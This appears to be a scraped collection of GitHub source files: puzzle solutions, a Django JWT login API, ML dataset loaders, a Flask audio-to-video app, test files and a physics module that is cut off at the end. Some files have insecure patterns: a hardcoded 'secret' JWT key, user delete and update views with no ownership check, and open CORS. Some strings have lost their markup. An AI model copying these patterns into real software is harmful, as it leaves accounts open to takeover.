+{"seq_id":"10860106410","text":"import sys\ndef problem1(path):\n\tlines = readFile(path)\n\trow = \"\"\n\tmaxNum = -sys.maxsize - 1\n\tminNum = sys.maxsize\n\tcheckSum = 0\n\tfor i in range(len(lines)):\n\t\trow = lines[i].split(\"\t\")\n\t\tfor j in range(len(row)):\n\t\t\tif int(row[j]) > maxNum:\n\t\t\t\tmaxNum = int(row[j])\n\t\t\tif int(row[j]) < minNum:\n\t\t\t\tminNum = int(row[j])\n\t\tcheckSum += (maxNum - minNum)\n\t\tmaxNum = -sys.maxsize - 1\n\t\tminNum = sys.maxsize\n\n\tprint(checkSum)\n\ndef problem2(path):\n\tlines = readFile(path)\n\trow = \"\"\n\tdiv = 0.0\n\tcheckSum = 0\n\tfor i in range(len(lines)):\n\t\trow = lines[i].split(\"\t\")\n\t\tfor j in range(len(row)):\n\t\t\tfor k in range(len(row)):\n\t\t\t\tif k!=j and (float(row[j]) % float(row[k]) == 0):\n\t\t\t\t\tdiv = float(row[j]) / float(row[k])\n\t\t\t\t\tbreak\n\t\t\tif div!= 0:\n\t\t\t\tcheckSum += div\n\t\t\t\tdiv = 0\n\t\t\t\tbreak\n\n\tprint(checkSum)\n\n\ndef readFile(path):\n\twith open(path, \"r\") as f:\n\t\ttemp = f.read().splitlines()\n\treturn temp\n\nproblem2(\"input.txt\")","repo_name":"lbruges/AoC","sub_path":"adventDay2.py","file_name":"adventDay2.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3054883152","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.serializers import AuthTokenSerializer\nfrom rest_framework.views import APIView\nfrom django.http import HttpResponse\nfrom knox.auth import AuthToken, TokenAuthentication\nfrom .serializers import RegisterSerializer\nfrom rest_framework import status, permissions, request\nfrom knox.views import LoginView\nfrom django.contrib.auth import login\n\ndef serialize_user(user):\n return {\n \"username\": user.username,\n \"email\": user.email,\n \"name\": user.first_name,\n }\n\nclass LoginAPI(LoginView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, format=None):\n serializer = 
AuthTokenSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n login(request, user)\n user_info = super(LoginAPI, self).post(request, format=None)\n serializer = serialize_user(user)\n user_info.data['username'] = serializer['username']\n user_info.data['email'] = serializer['email']\n user_info.data['name'] = serializer['name']\n return Response({'user_info': user_info.data}) \n\n@api_view(['POST'])\ndef register(request):\n serializer = RegisterSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n user = serializer.save()\n _, token = AuthToken.objects.create(user)\n return Response({\n \"user_info\": serialize_user(user),\n \"token\": token\n })\n\n@api_view(['GET'])\ndef get_user(request):\n user = request.user\n if user.is_authenticated:\n return Response({\n 'user_info': serialize_user(user)\n })\n return Response({'error_message': 'tidak terautentikasi'}, status.HTTP_401_UNAUTHORIZED)\n\nclass VerifyToken(APIView):\n def post(self, request):\n token = request.headers[\"Authorization\"][6:14]\n try:\n user = AuthToken.objects.get(token_key=token)\n return HttpResponse(user)\n except AuthToken.DoesNotExist:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail=\"Token salah\")\n ","repo_name":"ghifariaulia/auth-law","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8147757890","text":"\"\"\"\nA program to convert a number to hours, minutes, \nand seconds in a 24-hour clock format.\n\"\"\"\n\n#index will add s if plural\ndef singlePlural(num):\n if num == 1:\n return 0\n else:\n return 1\n \nsuffix = [\"\", \"s\"]\n\n#prompt the user to enter a number\ntime = int(input(\"Enter a number from 1 to 86400: \"))\n\n#conversion to hours, minutes, seconds\nhours = time // 3600\noutput_hours = \"hour{}\".format(suffix[singlePlural(hours)])\n \nminutes = (time % 3600) // 60\noutput_minutes = \"minute{}\".format(suffix[singlePlural(minutes)])\n\nseconds = (time % 3600) % 60\noutput_seconds = \"second{}\".format(suffix[ singlePlural(seconds)])\n\n#print conversion in hours, minutes, seconds\nprint(\"{} {}, {} {}, and {} {}\".format(hours, output_hours, minutes, output_minutes, seconds, output_seconds))\n","repo_name":"StphnWright/Numbering-Algorithms","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21011504713","text":"import os\nimport minerl\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\nDATASET_SIZE = 1916597\n\n\ndef dump_minerl_dataset(names, output_dir):\n if not isinstance(names, list):\n names = [names]\n\n initial_size = 1916597\n \n os.makedirs(output_dir)\n\n pov = np.memmap(output_dir + '/pov.npy', dtype='uint8', mode='w+', shape=(initial_size, 64, 64, 3))\n vec = np.memmap(output_dir + '/vector.npy', dtype='f', mode='w+', shape=(initial_size, 64))\n act = np.memmap(output_dir + '/action.npy', dtype='f', mode='w+', shape=(initial_size, 64))\n rew = np.memmap(output_dir + '/reward.npy', dtype='f', mode='w+', shape=(initial_size, 1))\n don = np.memmap(output_dir + '/done.npy', dtype='?', mode='w+', shape=(initial_size, 1))\n written = 0\n\n for name in names:\n minerl_dset = minerl.data.make(name, \"data\")\n\n for trajectory in 
tqdm(minerl_dset.get_trajectory_names()):\n traj_data = list(minerl_dset.load_data(trajectory))\n\n for i, data in enumerate(traj_data):\n current_state, action, reward, next_state, done = data\n idx = written + i\n pov[idx] = current_state['pov']\n vec[idx] = current_state['vector']\n act[idx] = action['vector']\n rew[idx, 0] = reward\n don[idx, 0] = done\n\n size = len(traj_data)\n written += size\n return written\n\n\nclass MineRlSequenceDataset(Dataset):\n def __init__(self, base_dir, sequence_length):\n initial_size = 1916597\n self.pov = np.memmap(base_dir + '/pov.npy', dtype='uint8', mode='r', shape=(initial_size, 64, 64, 3))\n self.vec = np.memmap(base_dir + '/vector.npy', dtype='f', mode='r', shape=(initial_size, 64))\n self.act = np.memmap(base_dir + '/action.npy', dtype='f', mode='r', shape=(initial_size, 64))\n self.rew = np.memmap(base_dir + '/reward.npy', dtype='f', mode='r', shape=(initial_size, 1))\n self.don = np.memmap(base_dir + '/done.npy', dtype='?', mode='r', shape=(initial_size, 1))\n self.sequence_length = sequence_length\n\n def __len__(self):\n return self.pov.shape[0] - self.sequence_length + 1\n\n def __getitem__(self, idx):\n end_idx = idx + self.sequence_length\n pov = np.float32(self.pov[idx:end_idx].transpose(0, 3, 1, 2)) / 255\n vec = self.vec[idx:end_idx]\n act = self.act[idx:end_idx]\n rew = self.rew[idx:end_idx]\n don = self.don[idx:end_idx].astype('float32')\n return (pov, vec, act, rew, don)\n\n \nclass MineRlImageDataset(Dataset):\n def __init__(self, base_dir, transform=None):\n initial_size = 1916597\n self.transform = transform\n self.pov = np.memmap(base_dir + '/pov.npy', dtype='uint8', mode='r', shape=(initial_size, 64, 64, 3))\n\n def __len__(self):\n return self.pov.shape[0]\n\n def __getitem__(self, idx):\n image = self.pov[idx]\n if self.transform:\n image = self.transform(image)\n return image","repo_name":"marthinwurer/minerl_stuff","sub_path":"dataset_preprocessing.py","file_name":"dataset_preprocessing.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14432230081","text":"#!/usr/bin/python3\n\n\ndef list_division(my_list_1, my_list_2, list_length):\n new_list = []\n for i in range(list_length):\n try:\n new = my_list_1[i] / my_list_2[i]\n except (TypeError, ValueError):\n new = 0\n print(\"wrong type\")\n except ZeroDivisionError:\n new = 0\n print(\"division by 0\")\n except IndexError:\n print(\"out of range\")\n new = 0\n finally:\n new_list.append(new)\n return (new_list)\n","repo_name":"EdithM5/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70478053857","text":"__author__ = 'Land'\r\n# http://people.duke.edu/~ccc14/pcfb/numpympl/MatplotlibBarPlots.html\r\n\r\n# http://blog.csdn.net/ywjun0919/article/details/8692018\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\n\r\n# 0-1 has 1000\r\n#x = np.random.normal(0,1,1000)\r\n\r\n# [0, 10) to get 30\r\n#x = np.random.randint(0, 10, 30)\r\n\r\n\r\n#x = np.linspace(0, 10, 11)\r\n# seperate with 5 part index\r\n\r\n\r\nx= [1, 1, 1, 2, 3,3,5, 5, ]\r\nnumBins = 3\r\nax.hist(x, numBins, color='green', alpha =0.8)\r\nprint(x)\r\ncounts, bins = np.histogram(x, 
numBins)\r\nprint(counts)\r\nprint(bins)\r\n#counts_n = counts / (sum (counts * np.diff(len(bins))))\r\n\r\nplt.show()\r\n","repo_name":"herofyf/python_examples","sub_path":"histplot.py","file_name":"histplot.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17598292700","text":"from data_structures.datacenter import Datacenter\nfrom requests.adapters import HTTPAdapter, Retry\nimport requests\n\nURL = \"http://www.mocky.io/v2/5e539b332e00007c002dacbe\"\n\n\ndef get_data(url, max_retries=5):\n session = requests.Session()\n retries = Retry(total=max_retries,\n backoff_factor=0.1)\n\n session.mount('http://', HTTPAdapter(max_retries=retries))\n response = session.get(url)\n return response.json()\n\ndef main():\n \"\"\"\n Main entry to our program.\n \"\"\"\n\n data = get_data(URL)\n if not data:\n raise ValueError('No data to process')\n\n datacenters = [\n Datacenter(key, value)\n for key, value in data.items()\n ]\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"georgespanac/ro_interview_assignment_vodafone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21507336147","text":"import numpy as np\nimport csv\nfrom cvxopt import matrix\nfrom cvxopt import solvers\nimport pandas as pd\nimport time\nimport json\nimport os\ndirname = os.path.dirname(__file__)\n# image size: 28x28, number of features = 784\nn = 784 \n# noise parameter\nC = 1.0\n\ndef KernelMat(X, gamma = 0.05):\n norm = np.linalg.norm(X,axis = 1, keepdims = True)\n norm_sq = norm*norm\n norm_sq_exp = np.exp(-1*gamma*norm_sq)\n dot_mat = np.exp(2*gamma*(X.dot(X.T)))\n kernel_mat = norm_sq_exp*dot_mat*(norm_sq_exp.T)\n return kernel_mat\n\ndef learn_model(d1,d2,train_file_name, verbose = 0 ):\n\n##### storing the training data ####\n\n # start timer\n start = time.time()\n Xd1 = [] # training data with label = d1\n Xd2 = [] # training data with label = d2\n file_train = open(train_file_name)\n csvReader = csv.reader(file_train)\n for row in csvReader:\n row_val = list(map(float, row))\n ## down scale data to range [0,1] from [0,255] ##\n if row_val[-1] == d1:\n Xd1.append(list(map( lambda x: x/255.0 ,row_val[:n])))\n elif row_val[-1] == d2:\n Xd2.append(list(map( lambda x: x/255.0 ,row_val[:n])))\n file_train.close()\n\n nd1 = len(Xd1)\n nd2 = len(Xd2)\n Xd1 = np.array(Xd1).reshape(nd1,-1)\n Xd2 = np.array(Xd2).reshape(nd2,-1)\n\n X = np.append(Xd1,Xd2,0) # [X] = mxn\n m = X.shape[0] # number of training examples\n y = np.concatenate((np.ones((nd1,1))*(-1.0), np.ones((nd2,1))), axis = 0)\n K = KernelMat(X)\n\n I = np.identity(m)\n I_bar = I * -1\n\n P = K * np.outer(y,y) # element wise multiplication\n q = np.ones((m,1))*(-1)\n A = np.concatenate((np.ones((nd1,1))*(-1.0),np.ones((nd2,1))*1.0),axis=0).T\n b = np.array([0]).reshape(1,1)\n G = np.append(I,I_bar,0) # [G] = 2m x m\n h = [C for i in range(m)] + [0 for i in range(m)] # [h] = 2m x 1\n\n P = matrix(P, tc = 'd')\n q = matrix(q, tc = 'd')\n G = matrix(G, tc = 'd')\n h = matrix(h, tc = 'd')\n A = matrix(A, tc = 'd')\n b = matrix(b, tc = 'd')\n\n sol = solvers.qp(P,q,G,h,A,b)\n alpha = sol['x']\n alpha = np.array(alpha)\n sv=X[np.ix_(alpha[:,0]>0.0000001,)] # support vectors \n sv_y = y[np.ix_(alpha[:,0]>0.0000001,)] # nsvx1\n alpha_sv = alpha[np.ix_(alpha[:,0]>0.0000001,)] # nsvx1\n print(\"No. 
of support vectors: \" + str(sv.shape[0]))\n\n # end timer\n end = time.time()\n print(\"Time taken to learn the model: \" + str(end-start))\n\n b1 = float(\"inf\")\n b2 = float(\"-inf\")\n for i in range(m):\n if alpha[i] > 0.00001:\n val = 0\n for j in range(m):\n if alpha[j] > 0.000001:\n val += alpha[j] * y[j] * K[i][j]\n if i
    \r\n Upload File:\r\n
    \r\n \r\n
    \r\n Netoyer es ville en doubles\r\n
    \r\n
    \r\n Lower case the name of the city\r\n
    \r\n
    \r\n recompt le nombre d'aire de jeux par département et par commune\r\n
    \r\n
    \r\n Fichier des villes
    \r\n Fichier des département
    \r\n
    \r\n
    \r\n creer le fichier site map\r\n
    \r\n
    \r\n Ajouter des dates sur les enregistrements de la base de données\r\n
    \r\n
    \r\n Affichage des enregistrement a valider\r\n
    \r\n
    \r\n Ajout a partir d'un fichier de type json\r\n
    \r\n
    \r\n Ajout a partir d'un fichier de type csv\r\n
    \r\n
    \r\n Ajout d'une limite autour des villes\r\n
    \r\n
    \r\n Ajout d'une limite autour des départements\r\n
    \r\n
    \r\n Simplifier les url des aires des jeux\r\n
    \r\n
    \r\n Ajouter les nombres manquants pour la ville de Caen\r\n
    \r\n
    \r\n Ajouter carvin\r\n
    \r\n
    \" % listheadtext\n\toutsidetag = _outertags.get(elemID, None)\n\tif outsidetag is not None:\n\t\theadnarrative = \"<%s>%s\" % (outsidetag, headnarrative)\n\t\tfootnarrative = \"\" % outsidetag\n\tinsidetag = _innertags.get(elemID, None)\n\tif insidetag is not None:\n\t\theadnarrative = \"%s<%s>\" % (headnarrative, insidetag)\n\t\tfootnarrative = \"%s\" % (insidetag, footnarrative)\n\tif outsidetag is not None or insidetag is not None:\n\t\tif headnarrative:\n\t\t\tnewdata['list_header'] = headnarrative\n\t\tif footnarrative:\n\t\t\tnewdata['list_footer'] = footnarrative\n\tcheckunchecktag = _checkunchecktags.get(elemID, None)\n\tif checkunchecktag is not None:\n\t\tcurrentchecked = element.get('checked_narrative', '')\n\t\tcurrentunchecked = element.get('unchecked_narrative', '')\n\t\tnewdata['checked_narrative'] = \"<%s>%s\" % (checkunchecktag, currentchecked, checkunchecktag)\n\t\tnewdata['unchecked_narrative'] = \"<%s>%s\" % (checkunchecktag, currentunchecked, checkunchecktag)\n\tlisttag = _presuftag.get(elemID, None)\n\tif listtag is not None:\n\t\tnewdata['list_prefix'] = \"<%s>\" % listtag\n\t\tnewdata['list_suffix'] = \"\" % listtag\n\tsublisttag = _sublisttags.get(elemID, None)\n\tif sublisttag is not None:\n\t\tnewdata['sublist_prefix'] = \"<%s>\" % sublisttag\n\t\tnewdata['sublist_suffix'] = \"\" % sublisttag\n\tif newdata:\n\t\tfor k, v in newdata.iteritems():\n\t\t\telement[k] = unicode(v)\n\telse: pass\n\ndef setup_form(pyform):\n\t\"\"\"The one function to bind them all.\n\tCalls the current implementation functions which set order_num,\n\tfield_ids, and data pertaining to the narrative.\"\"\"\n\tnew_set_order(pyform)\n\tnew_set_ids(pyform)\n\tnew_set_nar(pyform)","repo_name":"StickOnGit/pyfml","sub_path":"controllers/reorderform.py","file_name":"reorderform.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7580972111","text":"# coding : utf-8\n\n\nd = {1: 100, 2: 200, 3: 300}\n'''\nusername = input('Введите имя пользователя: ')\npassword = input('Введите пароль: ')\n\n\nwhile True:\n\tif len(password) < 8:\n\t\tprint('Пароль слишком короткий')\n\telif username.lower() in password.lower():\n\t\tprint(\"Пароль содержит имя пользователя\")\n\telif not '@' in password:\n\t\tprint('В пароле должна быть собака @')\n\telse:\n\t\tprint('Пароль для пользователя {} установлен'.format(username))\n\t\tbreak\n\t\t#continue Тоже самое что и break\n\tpassword = input('Введите пароль еще раз: ')\n'''\n\n\n\ntry:\n\tprint(d[5])\nexcept KeyError:\n\tprint('Такого ключа неееееееееет!!!!!!!!')\n\n","repo_name":"Dariec/DevNet","sub_path":"help/06-3-PasswordCheck.py","file_name":"06-3-PasswordCheck.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28864967781","text":"from elastictools.logsconf.log_conf import logging_config\nimport logging\nfrom logging.config import dictConfig\n\n\ndictConfig(logging_config)\nlogger = logging.getLogger(\"CONSOLE\")\n\n\ndef range(**kwargs):\n ranges = {}\n for key in kwargs.keys():\n ranges[\"range\"] = {key: {\"gte\": kwargs[key][0], \"lte\": kwargs[key][1]}}\n query = {\"query\": ranges}\n return query\n\n\ndef boolq(**kwargs):\n logical = {}\n for key in kwargs.keys():\n match = []\n for values in kwargs[key]:\n match.append({\"match\": {values[0]: values[1]}})\n logical[key] = match\n query = {\"query\": {\"bool\": logical}}\n return 
query\n\n\ndef createQuery(**kwargs):\n q_dictionary = dict()\n bool_dictionary = dict()\n if 'all' in kwargs.keys():\n q_dictionary = {\"query\": {\"match_all\": {}}}\n if 'limit' in kwargs.keys():\n q_dictionary[\"from\"] = 0\n q_dictionary[\"size\"] = kwargs['limit']\n '''for boolkey, boolvalues in kwargs.items():\n temp = []\n for key, values in boolvalues.items():\n if isinstance(values, list):\n temp.append({\"range\": {key: {\"gte\": values[0], \"lte\": values[1]}}})\n elif isinstance(values, set):\n values = list(values)\n match = []\n for val in values:\n temp.append({\"match\": {key: val}})\n else:\n temp.append({\"match\": {key: values}})\n bool_dictionary[boolkey] = temp\n if bool(bool_dictionary): \n q_dictionary[\"query\"] = bool_dictionary'''\n print(q_dictionary)\n return q_dictionary\n\n\ndef createQueryString(**kwargs):\n stringq = ''\n for value in kwargs['lucene']:\n stringq += ' ' + value\n q_dictionary = {\"query\": stringq}\n return {\"query\": {\"query_string\": q_dictionary}}\n\n\ndef addSource(q, source):\n q[\"_source\"] = source\n return q\n","repo_name":"AerinSistemas/elastictools","sub_path":"aerastic/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74473825056","text":"import flask\nfrom flask import jsonify, request\nfrom flask_cors import CORS\nimport json\nimport re\nimport string\nimport uuid\nimport requests\nfrom dotenv import load_dotenv\nimport os\n\nSTATIC_DIR = os.environ.get(\"STATIC_DIR\", \"./static\").rstrip(\"/\")\nprint(\"static dir:\", STATIC_DIR)\n\nif os.environ.get(\"USE_DEEPAI\") == \"true\":\n print(\"using deepai\")\n import deepai_images as generate_images\nelse:\n print(\"using stablediffusion\")\n import stablediff_images as generate_images\n\nimport video\n\nload_dotenv()\n\nallowed_origins=re.compile('(.*\\.)?deepgram\\.com(:\\d+)?')\n\napp = flask.Flask(__name__)\nCORS(app, origins=\"*\")\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef transcribe():\n if request.method == 'GET':\n return 'Hello, world!'\n else:\n request_id = uuid.uuid4()\n request_dir=f\"{STATIC_DIR}/{request_id}/\"\n\n if flask.request.is_json:\n req = flask.request.get_json()\n audio = requests.get(req[\"url\"]).content\n else:\n audio = flask.request.get_data()\n\n transcript = fetch_transcript(audio)\n if isinstance(transcript, str):\n # A string response indicates an error. 
Return it, and call it a 500 because error handling is boring\n return transcript, 500\n\n os.mkdir(request_dir)\n\n audio_path = request_dir + \"audio\"\n with open(audio_path, \"wb\") as audiof:\n audiof.write(audio)\n\n images = generate_images.text_to_images(transcript, request_dir)\n print(images)\n \n output_path = request_dir + \"video.mp4\"\n video.generate_video(audio_path, transcript, images, output_path)\n\n return {\"path\": f\"/assets/{request_id}/video.mp4\"}\n\n\n@app.route('/assets/', methods=['GET'])\ndef assets(path):\n print(\"sending %s from %s\" % (path, STATIC_DIR))\n return flask.send_from_directory(STATIC_DIR, path)\n\ndef fetch_transcript(audio: bytes):\n deepgram_response = requests.post(\"https://api.deepgram.com/v1/listen?model=general&language=en&tier=enhanced&punctuate=true&utterances=true\", headers={\n 'Authorization': 'Token {}'.format(os.environ.get(\"DEEPGRAM_API_KEY\"))\n }, data=audio)\n\n if deepgram_response.ok:\n response = deepgram_response.json()\n else:\n response = deepgram_response.text\n \n return response\n","repo_name":"deepgram-devs/nightmare-slideshows","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4682419192","text":"import idc\nimport idaapi\n\ndef main():\n\taddr = idaapi.get_screen_ea()\n\tif addr == idc.BADADDR:\n\t\tprint(\"Make sure you are in a function!\")\n\t\tidaapi.beep()\n\t\treturn\n\n\tfunc = idaapi.get_func(addr)\n\tif func is None:\n\t\tprint(\"Make sure you are in a function!\")\n\t\tidaapi.beep()\n\t\treturn\n\t\n\tfuncname = idaapi.get_name(func.start_ea)\n\tdemangled = idaapi.demangle_name(funcname, idc.get_inf_attr(idc.INF_SHORT_DN))\n\tprint(f\"{demangled or funcname}:\")\n\tprint(f\"Offset from {func.start_ea:08X} to {addr:08X} = {addr - func.start_ea} ({addr - func.start_ea:#X})\")\n\nmain()","repo_name":"Scags/IDA-Scripts","sub_path":"distfromfunc.py","file_name":"distfromfunc.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"34"} +{"seq_id":"20258767261","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import SignUpForm,UserUpdateForm\nfrom .models import UserDetail\nfrom rest_framework.response import Response\nimport jwt, datetime\nfrom rest_framework.exceptions import AuthenticationFailed\n\n\n# user details\n@login_required(login_url='login')\ndef user_details(request):\n token = request.session.get('jwt')\n if not token:\n raise AuthenticationFailed(detail='No token')\n try:\n payload = jwt.decode(token, 'secret', algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise AuthenticationFailed(detail='Invalid token')\n \n users = User.objects.all()\n user_details = UserDetail.objects.all()\n print(user_details)\n return render(request, 'main/user_details.html', {'users': users, 'user_details': user_details})\n\n\n# login with email and password\ndef login_view(request):\n if request.user is not None and request.user.is_authenticated:\n return redirect('user_details')\n if request.method == \"POST\":\n email = request.POST['email']\n username = User.objects.get(email=email).username\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n\n if 
user is not None:\n login(request, user)\n payload = {\n 'id': user.id,\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=5),\n 'iat': datetime.datetime.utcnow(),\n }\n\n token = jwt.encode(payload, 'secret', algorithm='HS256')\n request.session['jwt']=token\n return redirect('user_details')\n else:\n return render(request, 'main/login.html', {'error_message': 'Invalid login'})\n return render(request, 'main/login.html')\n \n\n# logout view\n@login_required(login_url='login')\ndef logout_view(request):\n del request.session['jwt']\n logout(request)\n return redirect('login')\n\n# signup view\ndef signup(request):\n form = SignUpForm(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n return render(request, 'main/signup.html', {'form': form})\n\n else:\n form = SignUpForm()\n return render(request, 'main/signup.html', {'form': form})\n\n\n\n# delete user_details\n@login_required(login_url='login')\ndef user_delete(request,email):\n token = request.session.get('jwt')\n if not token:\n raise AuthenticationFailed(detail='No token')\n try:\n payload = jwt.decode(token, 'secret', algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise AuthenticationFailed(detail='Invalid token')\n user = User.objects.get(email=email)\n user_details = UserDetail.objects.get(user=user)\n user_details.delete()\n user.delete()\n return redirect('user_details')\n\n\n# update user_details\n@login_required(login_url='login')\ndef user_update(request,email):\n token = request.session.get('jwt')\n if not token:\n raise AuthenticationFailed(detail='No token')\n try:\n payload = jwt.decode(token, 'secret', algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise AuthenticationFailed(detail='Invalid token')\n user = User.objects.get(email=email)\n user_detail = UserDetail.objects.get(user=user) \n form = UserUpdateForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save(user.pk)\n return redirect('user_details')\n else:\n return redirect('user_update',email)\n\n else:\n form = UserUpdateForm()\n return render(request, 'main/user_update.html', {'form': form, 'user':user_detail})\n\n\n\n\n\n\n","repo_name":"AYHD-youtube/nemesis-task","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31388195813","text":"# -*- coding: utf-8 -*-\n# pylint: disable=consider-using-with\nimport subprocess\nimport time\nimport pytest\nfrom eodhdc import EODHDWebSockets, exceptions\n\n\n@pytest.mark.asyncio\n@pytest.mark.eodhdws\n@pytest.mark.parametrize(\"case\", [\n [dict(key=\"demo\"), \"uk\", [\"TSLA\"], exceptions.WebsocketUnknownEndpoint],\n [dict(key=\"demo1\"), \"us\", [\"TSLA\"], exceptions.WebsocketAuthError],\n [dict(key=\"demo\"), \"us\", [\"TSLA1\"], exceptions.WebsocketResponseError]\n])\nasync def test_eodhdws_exceptions(case):\n \"\"\"Module exceptions tests.\"\"\"\n wss = subprocess.Popen([\"python\", \"tests/wss.py\"])\n time.sleep(0.3)\n with pytest.raises(case[3]):\n eodhdws = EODHDWebSockets(**case[0])\n eodhdws.base = \"ws://127.0.0.1:8001/ws\"\n async with eodhdws.connect(case[1]) as websocket:\n await eodhdws.subscribe(websocket, case[2])\n await eodhdws.receive(websocket).__anext__()\n wss.terminate()\n\n\n@pytest.mark.asyncio\n@pytest.mark.eodhdws\nasync def test_eodhdws_flow():\n \"\"\"Client flow test.\"\"\"\n wss = 
subprocess.Popen([\"python\", \"tests/wss.py\"])\n time.sleep(0.3)\n eodhdws = EODHDWebSockets(buffer=10)\n eodhdws.base = \"ws://127.0.0.1:8001/ws\"\n async with eodhdws.connect(\"us\") as websocket:\n eodhdws.activate()\n await eodhdws.subscribe(websocket, [\"TSLA\", \"MSFT\"])\n await eodhdws.unsubscribe(websocket, [\"MSFT\"])\n async for msg in eodhdws.receive(websocket):\n assert len(msg)\n eodhdws.deactivate()\n assert len(eodhdws.buffer)\n wss.terminate()\n","repo_name":"wargx/eodhdc","sub_path":"tests/test_eodhdws.py","file_name":"test_eodhdws.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"39694937244","text":"from pycbio.tsv import TsvTable, TsvReader\n\n# inId\tselectId\tinOverlap\tselectOverlap\toverBases\tsimilarity\ntypeMap = {\n \"inOverlap\": float,\n \"selectOverlap\": float,\n \"overBases\": int,\n \"similarity\": float}\n\n\nclass OverlapSelectStatsReader(TsvReader):\n \"reader for output from overlapSelect -statsOutput\"\n\n def __init__(self, fileName):\n super(OverlapSelectStatsReader, self).__init__(fileName, typeMap=typeMap)\n\n\nclass OverlapSelectStatsTbl(TsvTable):\n \"table of overlapSelect -statsOutput results\"\n def __init__(self, fileName):\n super(OverlapSelectStatsTbl, self).__init__(fileName, typeMap=typeMap, multiKeyCols=(\"inId\", \"selectId\"))\n\n\n__all__ = [OverlapSelectStatsReader.__name__, OverlapSelectStatsTbl.__name__]\n","repo_name":"diekhans/pycbio","sub_path":"lib/pycbio/hgdata/overlapSelectStats.py","file_name":"overlapSelectStats.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"5911415671","text":"c = int(input())\r\nanswer = []\r\n\r\nfor i in range(c):\r\n temp = list(map(int, input().split()))\r\n total = temp.pop(0)\r\n avg = sum(temp)/total\r\n cnt = 0\r\n \r\n for e in temp:\r\n if e > avg:\r\n cnt += 1\r\n \r\n ratio = (cnt/total) * 100\r\n \r\n answer.append(round(ratio, 3))\r\n\r\nfor e in answer:\r\n print('{:.3f}%'.format(e))","repo_name":"minzihun/algorithm-study","sub_path":"백준/Bronze/4344.평균은 넘겠지/평균은 넘겠지.py","file_name":"평균은 넘겠지.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70152239139","text":"# This module computes the the Weyl scalars based on\n# Baker, Campanelli, and Lousto. PRD 65, 044001 (2002);\n# https://arxiv.org/abs/gr-qc/0104063\n\n# Step 1: import all needed modules from NRPy+:\nimport NRPy_param_funcs as par\nimport indexedexp as ixp\nimport grid as gri\nimport finite_difference as fin\nimport reference_metric as rfm\nrfm.reference_metric()\nfrom outputC import *\nimport BSSN_RHSs as bssn\nimport sympy as sp\n\n# Step 1: Initialize WeylScalar parameters\nthismodule = __name__\n# Use proper names for Tetrad Choices. 
